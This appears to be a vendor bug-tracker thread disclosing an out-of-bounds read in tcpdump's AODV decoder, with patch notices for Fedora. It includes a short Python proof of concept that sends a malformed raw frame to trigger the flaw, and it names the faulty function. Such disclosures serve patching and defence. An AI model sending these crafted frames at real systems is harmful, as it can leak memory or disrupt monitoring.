Following issue was reported in :
The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults.
To reproduce start tcpdump on a network interface
sudo tcpdump -i lo -s 0 -n -v
(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)
and use the following python program to generate a frame on the network (might also need sudo):
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
Affected versions are 3.8 through 4.6.2
Created tcpdump tracking bugs for this issue:
Affects: fedora-all [bug 1165167]
Created attachment 961288 [details]
In function udp_print(register const u_char *bp, u_int length, register const u_char *bp2, int fragmented) the value of argument length is not checked properly, which results in the crash of the tcpdump when trying to print data from the malformed AOVD payload.
tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
Red Hat Product Security has rated this issue as having low security impact, a future update may address this flaw in tcpdump.
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):